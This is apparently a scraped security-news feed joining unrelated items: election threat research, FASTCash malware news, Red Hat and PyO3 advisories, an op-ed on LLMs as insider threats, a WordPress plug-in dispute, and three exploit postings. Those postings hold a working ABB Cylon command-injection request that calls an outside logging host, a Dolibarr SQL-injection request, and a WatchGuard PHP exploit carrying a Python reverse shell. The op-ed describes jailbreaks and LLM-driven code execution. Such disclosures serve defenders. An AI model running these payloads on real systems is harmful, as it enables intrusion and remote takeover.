Organizations should be on high alert until next month's US presidential election to ensure the integrity of the voting process, researchers warn.

Source: Jon Helgason via Alamy Stock Photo

Cyber-threat actors have ramped up their targeting of the 2024 US elections with a flood of malicious activity expected to peak over the next month, aimed at causing disruption to voters and the election process and requiring increased vigilance on the part of stakeholders.

Specifically, attackers have bolstered election-related threat activity since the beginning of the year with an increase in the sale of phishing kits targeting US voters and campaign donors; the registration of more than 1,000 domains aimed at exploiting election-related content for malicious purposes; and increased ransomware activity targeting government entities, according to research from FortiGuard Labs Threat Research released today.

Since the inception of Internet-related threats, cyber-threat actors have typically increased malicious activity ahead of elections, notes Derek Manky, chief security strategist and vice president of global threat intelligence at Fortinet. However, they aim to be especially disruptive during the current election cycle, requiring that all stakeholders be prepared to fend off malicious actors in the upcoming weeks to protect election outcomes.

"As the 2024 US presidential election approaches, it's critical to recognize and understand the cyber threats that may impact the integrity and trustworthiness of the election process and the welfare of the participating citizens," he says.

Indeed, separate research has found that adversaries from Russia, China, and Iran in particular have been using cyber operations to stoke discord and influence election outcomes rather than make direct attacks on voting machines or other voter infrastructure. These more insidious tactics require a different type of vigilance on the part of defenders, the researchers noted.

**Specific Threats to Watch For**

FortiGuard Labs' latest election-threat research is the result of analysis of threats gathered from January 2024 to August 2024 that may affect US-based entities and the electoral process. The researchers discovered several key areas of threat activity that have been on the rise.

One is a significant increase in the availability of affordable phishing kits on the Dark Web designed to target voters and donors by impersonating the presidential candidates and their campaigns. Specifically, the researchers found kits for $1,260 created to impersonate US presidential candidates and to harvest personal information, including names, addresses, and credit card details.

Part of the phishing activity around the current election cycle also includes an increase of highly convincing mobile scams that use phone calls, voicemails, or messaging services that leverage deepfake technology to spread misinformation, which can affect voter outcomes, notes Alex Quilici, CEO at YouMail.

"AI can now create highly convincing voice attacks that make it sound like a trusted figure, such as a candidate, urging you not to vote or spreading false information," he says. "This kind of deception can seriously undermine public trust and disrupt the electoral process."

Attackers also have registered more than 1,000 new potentially malicious domains since the beginning of 2024 that incorporate election-related content and candidates to lure unsuspecting targets and potentially conduct nefarious activities, the researchers noted. The two most-used hosting providers for these election-themed websites are AMAZON-02 and CLOUDFLARENET, demonstrating that attackers are leveraging known, reputable services to bolster the legitimacy of malicious domains.

Another way cyberattackers can spread misinformation and disrupt the democratic process is through the use of people's personal information to directly target them, the researchers noted. Fortinet found that there currently is an abundance of this type of material on the Dark Web, with more than 1.3 billion rows of combo lists — which include usernames, email addresses, and passwords — of US citizens for sale for nefarious use.

The availability of this data poses a considerable risk for credential-stuffing attacks that allow cybercriminals to gain unauthorized access to people's accounts. Overall, the availability of so much personal data of various election stakeholders creates potential indirect disruption in the voting process, notes Casey Ellis, founder and chief strategy officer at Bugcrowd.

"While it may be difficult to use these records to commit the kind of fraud or attacks that would directly modify the outcome of an election, it's certainly a cheap and simple exercise to simply highlight the possibility of their use as a way to instill distrust in the democratic process, and to potential affect and manipulate voter turnout," he says.

FortiGuard Labs researchers also noted a 28% increase in ransomware attacks against the US government year-over-year based on observed leak sites. This type of activity also can threaten the integrity of the election process by undermining citizens' trust in the ability of the government to protect the personal data they collect from them.

**Protect Election Integrity**

To ensure the US presidential election process runs smoothly for all that wish to participate, Fortinet offered some recommendations to prevent and mitigate attacks between now and election day. The researchers advised that individuals and organizations alike always remain vigilant for suspicious behavior or activity leading up to major election-related events and prioritize good cyber hygiene in general to reduce potential threats.

Organizations, especially those related to the election or government agencies, should prioritize employee training and awareness about the cyber threats that exist that aim to disrupt the election process. Enforcing multifactor authentication and a strong password policy across both individuals' and organizations' online accounts also can protect against intrusion.

Finally, any organization with a stake in the election also should install endpoint protection solutions, patch operating systems and Web servers, and update software regularly to ensure systems are as secure as possible, Fortinet recommended.

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Cyberattackers Unleash Flood of Potentially Disruptive Election-Related Activity

North Korean threat actors have been observed using a Linux variant of a known malware family called FASTCash to steal funds as part of a financially-motivated campaign.
The malware is "installed on payment switches within compromised networks that handle card transactions for the means of facilitating the unauthorized withdrawal of cash from ATMs," a security researcher who goes by HaxRob said.

North Korean threat actors have been observed using a Linux variant of a known malware family called **FASTCash** to steal funds as part of a financially-motivated campaign.

The malware is "installed on payment switches within compromised networks that handle card transactions for the means of facilitating the unauthorized withdrawal of cash from ATMs," a security researcher who goes by HaxRob said.

FASTCash was first documented by the U.S. government in October 2018 as used by adversaries linked to North Korea in connection with an ATM cashout scheme targeting banks in Africa and Asia since at least late 2016.

"FASTCash schemes remotely compromise payment switch application servers within banks to facilitate fraudulent transactions," the agencies noted at the time.

"In one incident in 2017, HIDDEN COBRA actors enabled cash to be simultaneously withdrawn from ATMs located in over 30 different countries. In another incident in 2018, HIDDEN COBRA actors enabled cash to be simultaneously withdrawn from ATMs in 23 different countries."

While prior FASTCash artifacts have systems running Microsoft Windows (including one spotted as recently as last month) and IBM AIX, the latest findings show that samples designed for infiltrating Linux systems were first submitted to the VirusTotal platform in mid-June 2023.

The malware takes the form of a shared object ("libMyFc.so") that's compiled for Ubuntu Linux 20.04. It's designed to intercept and modify ISO 8583 transaction messages used for debit and credit card processing in order to initiate unauthorized fund withdrawals.

Specifically, it entails manipulating declined (magnetic swipe) transaction messages due to insufficient funds for a predefined list of cardholder account numbers and approving them to withdraw a random amount of funds in Turkish Lira.

The funds withdrawn per fraudulent transaction range from 12,000 to 30,000 Lira ($350 to $875), mirroring a Windows FASTCash artifact ("switch.dll") previously detailed by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) in September 2020.

"\[The\] discovery of the Linux variant further emphasizes the need for adequate detection capabilities which are often lacking in Linux server environments," the researcher said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Linux Variant of FASTCash Malware Targets Payment Switches in ATM Heists

ABB Cylon Aspect version 3.08.00 suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the country, state, locality, organization, and hostname HTTP POST parameters called by the sslCertAjax.php script.

ABB Cylon Aspect 3.08.00 (sslCertAjax.php) Remote Code ExecutionVendor: ABB Ltd.Product web page: https://www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: <=3.08.00Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices.Desc: The ABB BMS/BAS controller suffers from an authenticated OS commandinjection vulnerability. This can be exploited to inject and execute arbitraryshell commands through the 'country', 'state', 'locality', 'organization', and'hostname' HTTP POST parameters called by the sslCertAjax.php script.Tested on: GNU/Linux 3.15.10 (armv7l) GNU/Linux 3.10.0 (x86_64) GNU/Linux 2.6.32 (x86_64) Intel(R) Atom(TM) Processor E3930 @ 1.30GHz Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz PHP/7.3.11 PHP/5.6.30 PHP/5.4.16 PHP/4.4.8 PHP/5.3.3 AspectFT Automation Application Server lighttpd/1.4.32 lighttpd/1.4.18 Apache/2.2.15 (CentOS) OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscienceAdvisory ID: ZSL-2024-5842Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5842.php21.04.2024--$ cat project P R O J E C T .| | | |'| ._____ ___ | | |. |' .---"| _ .-' '-. | | .--'| || | _| | .-'| _.| | || '-__ | | | || | |' | |. | || | | | | || | ____| '-' ' "" '-' '-.' '` |____░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ $ curl -X POST "http://192.168.73.31/sslCertAjax.php" \> -H "Cookie: PHPSESSID=xxx" \> -d "opType=genCert\> &country=`sleep 1`\> &state=`sleep 2`\> &locality=`sleep 3`\> &organization=`sleep 4`\> &hostname=ZSL$(curl -A `id` remotelog.zeroscience.mk)" ; ./incom -l httplog &<div>Certificate Generation Successful</div>[1] + 50123 done incom$$ cat httplog------ remotelog ------GET / HTTP/1.1User-Agent: uid=33(www-data)Host: remotelog.zeroscience.mkAccept: */*------ remotelog ------$ shutdown -h +17 "Good afternoon, good evening and good night."

ABB Cylon Aspect 3.08.00 sslCertAjax.php Remote Command Execution

Dolibarr version 20.0.1 suffers from a remote SQL injection vulnerability.

## Titles: dolibarr 20.0.1 Multiple security token SQLi## Author: nu11secur1ty## Date: 10/15/2024## Vendor: https://www.dolibarr.org/## Software: https://www.dolibarr.org/downloads.php## Reference: https://portswigger.net/web-security/sql-injection## Description:The `socid` parameter appears to be vulnerable to SQL injection attacks.The attacker can get sensitive information for the MySQL database from thissystem when he attacks it online from inside!He can do this, by using a vulnerable security token to access the webapplication!STATUS: Medium- Vulnerability[+]Exploits:- SQLi Multiple:```POST /dolibarr-20.0.1/htdocs/commande/stats/index.php HTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflate, brAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36Connection: closeCache-Control: max-age=0Cookie:DOLSESSID_0297178cd410ba92966a17032c81774a6acb1ec7=hsq658oejrct1401omd4nf2c5qOrigin: http://pwnedhost.comUpgrade-Insecure-Requests: 1Referer:http://pwnedhost.com/dolibarr-20.0.1/htdocs/commande/stats/index.php?leftmenu=orders_suppliers&mode=supplierContent-Type: application/x-www-form-urlencodedSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129","Chromium";v="129"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 357token=ac1770a37880433e4ca36f69be4a8bf2&mode=supplier&socid=-1nu11secur1ty'%20or%201%3d1%23&typent_id=-1&categ_id=-1&userid=1&object_status_multiselect=1&object_status%5B%5D=0&object_status%5B%5D=1&object_status%5B%5D=2&object_status%5B%5D=3&object_status%5B%5D=4&object_status%5B%5D=5&object_status%5B%5D=6%2C7&object_status%5B%5D=9&year=2024&submit=Refresh```[+]Response:```SQLiHTTP/1.1 200 OKDate: Tue, 15 Oct 2024 10:23:43 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4X-Powered-By: PHP/8.2.4Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINReferrer-Policy: same-originConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 80974<!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="robots" content="noindex,nofollow"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="author...[SNIP]... mysqli ...[SNIP]... You have an error in your SQL syntax; check the manual thatcorresponds to your MariaDB server version for the right syntax to use near'WHERE c.date_commande BETWEEN '2022-01-01 00:00:00' AND '2022-12-3123:59:59'...' at line 1<b...[SNIP]... mysqli ...[SNIP]... You have an error in your SQL syntax; check the manual thatcorresponds to your MariaDB server version for the right syntax to use near'WHERE c.date_commande BETWEEN '2023-01-01 00:00:00' AND '2023-12-3123:59:59'...' at line 1<b...[SNIP]... mysqli ...[SNIP]... You have an error in your SQL syntax; check the manual thatcorresponds to your MariaDB server version for the right syntax to use near'WHERE c.date_commande BETWEEN '2024-01-01 00:00:00' AND '2024-12-3123:59:59'...' at line 1<b...[SNIP]... mysqli ...[SNIP]... You have an error in your SQL syntax; check the manual thatcorresponds to your MariaDB server version for the right syntax to use near') FROM WHERE c.date_commande BETWEEN '2022-01-01 00:00:00' AND '2022-12-312...' at line 1<b...[SNIP]... mysqli ...[SNIP]... You have an error in your SQL syntax; check the manual thatcorresponds to your MariaDB server version for the right syntax to use near') FROM WHERE c.date_commande BETWEEN '2023-01-01 00:00:00' AND '2023-12-312...' at line 1<b...[SNIP]... mysqli ...[SNIP]... You have an error in your SQL syntax; check the manual thatcorresponds to your MariaDB server version for the right syntax to use near') FROM WHERE c.date_commande BETWEEN '2024-01-01 00:00:00' AND '2024-12-312...' at line 1<b...[SNIP]... mysqli ...[SNIP]... You have an error in your SQL syntax; check the manual thatcorresponds to your MariaDB server version for the right syntax to use near') FROM WHERE c.date_commande BETWEEN '2022-01-01 00:00:00' AND '2022-12-312...' at line 1<b...[SNIP]... mysqli ...[SNIP]... You have an error in your SQL syntax; check the manual thatcorresponds to your MariaDB server version for the right syntax to use near') FROM WHERE c.date_commande BETWEEN '2023-01-01 00:00:00' AND '2023-12-312...' at line 1<b...[SNIP]... mysqli ...[SNIP]... You have an error in your SQL syntax; check the manual thatcorresponds to your MariaDB server version for the right syntax to use near') FROM WHERE c.date_commande BETWEEN '2024-01-01 00:00:00' AND '2024-12-312...' at line 1<b...[SNIP]... mysqli ...[SNIP]... You have an error in your SQL syntax; check the manual thatcorresponds to your MariaDB server version for the right syntax to use near') as total, AVG() as avg FROM WHERE c.entity IN (1) AND c.fk_user_author =1...' at line 1<b```## Reproduce:[href](https://www.patreon.com/posts/dolibarr-20-0-1-114038337)## Demo PoC:[href](https://www.nu11secur1ty.com/2024/10/dolibarr-2001-multiple-security-token.html)## Time spent:05:27:00

Dolibarr 20.0.1 SQL Injection

WatchGuard XTM Firebox version 12.5.x suffers from a buffer overflow vulnerability.

=============================================================================================================================================| # Title : WatchGuard XTM Firebox 12.5.x Code Injection Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) || # Vendor : https://www.watchguard.com/wgrd-help/documentation/xtm |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 86 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass WatchGuardExploit { private $targetUri; private $lhost; private $lport; private $shell; public function __construct($targetUri, $lhost, $lport, $shell = "/usr/bin/python") { $this->targetUri = $targetUri; $this->lhost = $lhost; $this->lport = $lport; $this->shell = $shell; } public function sendRequest($method, $url, $data = null, $headers = []) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method); if ($data) { curl_setopt($ch, CURLOPT_POSTFIELDS, $data); } if (!empty($headers)) { curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); } $response = curl_exec($ch); curl_close($ch); return $response; } public function checkWatchGuardFirebox() { $url = $this->targetUri . '/auth/login'; $response = $this->sendRequest('GET', $url, null, ['from_page' => '/']); if ($response && strpos($response, 'Powered by WatchGuard Technologies') !== false && strpos($response, 'Firebox') !== false) { return true; } return false; } public function createBofPayload() { // Generate the buffer overflow payload with Python reverse shell code $randomStr = bin2hex(random_bytes(2)); // 4-character random alphanumeric $pyFilename = "/tmp/" . $randomStr . ".py"; $payload = "<methodCall><methodName>agent.login</methodName><params><param><value><struct><member><value><" . str_repeat('A', 3181) . "MFA>"; $payload .= str_repeat('<BBBBMFA>', 3680); // Include a Python reverse shell command as the payload $payload .= 'import socket;from subprocess import call; from os import dup2;'; $payload .= 's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'; $payload .= 's.connect(("' . $this->lhost . '",' . $this->lport . '));'; $payload .= 'dup2(s.fileno(),0); dup2(s.fileno(),1); dup2(s.fileno(),2);'; $payload .= 'call(["' . $this->shell . '","-i"]);'; $payload .= 'import os; os.remove("' . $pyFilename . '");'; return gzencode($payload); // gzip encoding } public function exploit() { if (!$this->checkWatchGuardFirebox()) { echo "Target is not vulnerable.\n"; return; } echo "Target is vulnerable. Sending exploit...\n"; $bofPayload = $this->createBofPayload(); // Send the buffer overflow payload $url = $this->targetUri . '/agent/login'; $this->sendRequest('POST', $url, $bofPayload, [ 'Accept-Encoding: gzip, deflate', 'Content-Encoding: gzip' ]); echo "Payload sent.\n"; }}// Example usage:$exploit = new WatchGuardExploit('https://target-ip:8080', 'attacker-ip', 4444);$exploit->exploit();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

WatchGuard XTM Firebox 12.5.x Buffer Overflow

The family of functions to read "borrowed" values from Python weak references were fundamentally unsound, because the weak reference does itself not have ownership of the value. At any point the last strong reference could be cleared and the borrowed value would become dangling.

In PyO3 0.22.4 these functions have all been deprecated and patched to leak a strong reference as a mitigation. PyO3 0.23 will remove these functions entirely.



**Exploitability Metrics**

Attack Vector: This metric reflects the context by which vulnerability exploitation is possible. This metric value (and consequently the resulting severity) will be larger the more remote (logically, and physically) an attacker can be in order to exploit the vulnerable system. The assumption is that the number of potential attackers for a vulnerability that could be exploited from across a network is larger than the number of potential attackers that could exploit a vulnerability requiring physical access to a device, and therefore warrants a greater severity.

Attack Complexity: This metric captures measurable actions that must be taken by the attacker to actively evade or circumvent existing built-in security-enhancing conditions in order to obtain a working exploit. These are conditions whose primary purpose is to increase security and/or increase exploit engineering complexity. A vulnerability exploitable without a target-specific variable has a lower complexity than a vulnerability that would require non-trivial customization. This metric is meant to capture security mechanisms utilized by the vulnerable system.

Attack Requirements: This metric captures the prerequisite deployment and execution conditions or variables of the vulnerable system that enable the attack. These differ from security-enhancing techniques/technologies (ref Attack Complexity) as the primary purpose of these conditions is not to explicitly mitigate attacks, but rather, emerge naturally as a consequence of the deployment and execution of the vulnerable system.

Privileges Required: This metric describes the level of privileges an attacker must possess prior to successfully exploiting the vulnerability. The method by which the attacker obtains privileged credentials prior to the attack (e.g., free trial accounts), is outside the scope of this metric. Generally, self-service provisioned accounts do not constitute a privilege requirement if the attacker can grant themselves privileges as part of the attack.

User interaction: This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable system. This metric determines whether the vulnerability can be exploited solely at the will of the attacker, or whether a separate user (or user-initiated process) must participate in some manner.

**Vulnerable System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the VULNERABLE SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the VULNERABLE SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the VULNERABLE SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

**Subsequent System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the SUBSEQUENT SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the SUBSEQUENT SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the SUBSEQUENT SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

GHSA-f8x4-f32r-w556: PyO3 has a risk of use-after-free in `borrowed` reads from Python weak references

Red Hat Security Advisory 2024-8081-03 - An update for OpenIPMI is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8081.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: OpenIPMI security updateAdvisory ID:        RHSA-2024:8081-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8081Issue date:         2024-10-15Revision:           03CVE Names:          CVE-2024-42934====================================================================Summary: An update for OpenIPMI is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The OpenIPMI packages provide command-line tools and utilities to access platform information using Intelligent Platform Management Interface (IPMI). System administrators can use OpenIPMI to manage systems and to perform system health monitoring.Security Fix(es):* openipmi: missing check on the authorization type on incoming LAN messages in IPMI simulator (CVE-2024-42934)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-42934References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2308375

Red Hat Security Advisory 2024-8081-03

The inherent intelligence of large language models gives them unprecedented capabilities like no other enterprise tool before.

Shaked Reiner, Principal Security Researcher, CyberArk Labs

October 15, 2024

5 Min Read

Source: Krot\_Studio via Alamy Stock Photo

Today, security teams are treating large language models (LLMs) as a vital and trusted business tool that can automate tasks, free up employees to do more strategic functions, and give their company a competitive edge. However, the inherent intelligence of LLMs gives them unprecedented capabilities like no other enterprise tool before. The models are inherently susceptible to manipulation, so they behave in ways they aren't supposed to, and adding more capabilities makes the impact of that risk even more severe.

This is particularly risky if the LLM is integrated with another system, such as a database containing sensitive financial information. It's similar to an enterprise giving a random contractor access to sensitive systems, telling them to follow all orders given to them by anyone, and trusting them not to be susceptible to coercion.

Because LLMs lack critical thinking capabilities and are designed to just respond to queries with guardrails of limited degrees of strength, they need to be treated as potential adversaries, and security architectures should be designed following a new "assume breach" paradigm. Security teams must operate under the assumption that the LLM can and will act in the best interest of an attacker and build protections around it.

**LLM Security Threats to the Enterprise**

There are a number of security risks LLMs pose to enterprises. One common risk is that they can be jailbroken and forced to operate in a way they were not intended for. This can be accomplished by inputting a prompt in a manner that breaks the model's safety alignment. For example, many LLMs are designed to not provide detailed instructions when prompted for how to make a bomb. They respond that they can't answer that prompt. But there are certain techniques that can be used to get around the guardrails. An LLM that has access to internal corporate user and HR data could conceivably be tricked into providing details and analysis about employee working hours, history, and the org chart to reveal information that could be used for phishing and other cyberattacks.

A second, bigger threat to organizations is that LLMs can contribute to remote code execution (RCE) vulnerabilities in systems or environments. Threat researchers presented a paper at Black Hat Asia this spring that found that 31% of the targeted code bases — mostly GitHub repositories of frameworks and tools that companies deploy in their networks — had remote execution vulnerabilities caused by LLMs.

When LLMs are integrated with other systems within the organization, the potential attack surface expands. For example, if an LLM is integrated with a core business operation like finance or auditing, a jailbreak can be used to trigger a particular action within that other system. This capability could lead to lateral movement to other applications, theft of sensitive data, and even making changes to data within financial documents that might be shared externally, impacting share price or otherwise causing harm to the business.

**Fixing the Root Cause Is More Than a Patch Away**

These are not theoretical risks. A year ago, a vulnerability was discovered in the popular LangChain framework for developing LLM-integrated apps, and other iterations of it have been reported recently. The vulnerability could be used by an attacker to make the LLM execute code, say a reverse shell, which would give access to the server running the system.

Currently, there aren't sufficient security measures in place to address these issues. There are content filtering systems, designed to identify and block malicious or harmful content, possibly based on static analysis or filtering and block lists. And Meta offers Llama Guard, which is an LLM trained to identify jailbreaks and malicious attempts at manipulating other LLMs. But that is more of a holistic approach to treating the problem externally, rather than addressing the root cause.

It's not an easy problem to fix, because it's difficult to detect the root cause. With traditional vulnerabilities, you can patch the specific line of code that is problematic. But LLMs are more obscure, and we don't have visibility into the black box that we need to do specific code fixes like that. The big LLM vendors are working on security, but it's not a top priority; they're all competing for market share, so they're focused on features.

Despite these limitations, there are things enterprises can do to protect themselves. Here are five recommendations to help mitigate the insider threat that LLMs can become:

1.  Enforce the privilege of least privilege: Provide the bare minimum privilege needed to perform a task. Ask yourself: How does providing least privilege materially affect the functionality and reliability of the LLM?
    
2.  Don't use an LLM as a security perimeter: Only give it the abilities you intend it to use, and don't rely on a system prompt or alignment to enforce security.
    
3.  Limit the LLM's scope of action: Restrict its capabilities by making it impersonate the end user.
    
4.  Sanitize the training data and LLM output and the training data: Before using any LLM, make sure there is no sensitive data going into the system, and validate all output. For example, remove XSS payloads that are in the form of markdown syntax or HTML tags.
    
5.  Use a sandbox: In the event you want to use the LLM to run code, you will want to keep the LLM in a protected area.
    

The OWASP Top 10 list for LLMs has additional information and recommendations, but the industry is in the early stages of research in this field. The pace of development and adoption has happened so quickly that threat intel and risk mitigation haven't been able to keep up. Until then, enterprises need to use the insider threat paradigm to protect against LLM threats.

**About the Author**

Principal Security Researcher, CyberArk Labs

Shaked Reiner is a principal security researcher at CyberArk Labs with over a decade of experience in reverse engineering and vulnerability research. His expertise spans malware, low-level systems, operating systems, blockchain, and AI. Shaked has a passion for researching peculiar machines and enjoys explaining complex ideas in an accessible way, whether in cybersecurity or philosophy.

LLMs Are a New Type of Insider Adversary

WordPress moves could have security implications for sites using Advanced Custom Fields plug-in.

Source: Primakov via Shutterstock

Organizations using WordPress plug-in Advanced Custom Fields (ACF) are in the middle of an ugly and very public dispute between WP Engine (WPE), the maker of the plug-in, and Matt Mullenweg, the founder of the open source content management system.

At stake is how users of the plug-in receive security fixes and other updates going forward after Mullenweg announced his decision over the weekend to fork ACF into a new version called Secure Content Fields (SCF). He also cut off WPE's access to WordPress.org's update servers.

**Forced Changes**

Following the fork, sites that use free versions of ACF and also have auto-updates from WordPress.org enabled will automatically get switched to SCF and receive future updates for the plug-in through WordPress.org. Sites owners that want to remain on ACF and receive updates via WPE need to install an alternate update mechanism that the vendor has released.

Meanwhile, customers of the paid ACF version will continue to receive updates directly from WPE and need to do nothing differently.

Mullenweg is the founder of WordPress and CEO of Automattic, the owner of WordPress.com, which hosts a commercial version of the content management system, just like WP Engine does.  In recent weeks, Mullenweg has launched a series of scathing attacks on WP Engine, a company he has described as profiting enormously off the open source software model while returning very little back to the community.

**Bitter and Escalating Battle**

"What WP Engine gives you is not WordPress, it's something that they’ve chopped up, hacked, butchered to look like WordPress, but actually they’re giving you a cheap knock-off and charging you more for it," Mullenweg asserted in a September blog post. "This is one of the many reasons they are a cancer to WordPress, and it’s important to remember that unchecked, cancer will spread." Mullenweg described his decision to fork ACF into a new plug-in as a move to "remove commercial upsells and fix a security problem" that WP Engine allegedly has failed to fix.

Mullenweg recently claimed that WPE needed a trademark license to continue selling services under the WordPress name and demanded 8% of the company's revenue on a monthly basis for the right to use the name. In September, he banned WPE from accessing WordPress.org resources, citing the need for the company to have a trademark license.

WPE's ACF team, for its part, characterized Mullenweg's decision as violating open source guidelines and setting a troubling precedent. The company has dismissed Mullenweg's claims about the plug-in's security. "A plugin under active development has never been unilaterally and forcibly taken away from its creator without content in the 21 year history of WordPress," the ACF team posted on social media site X.

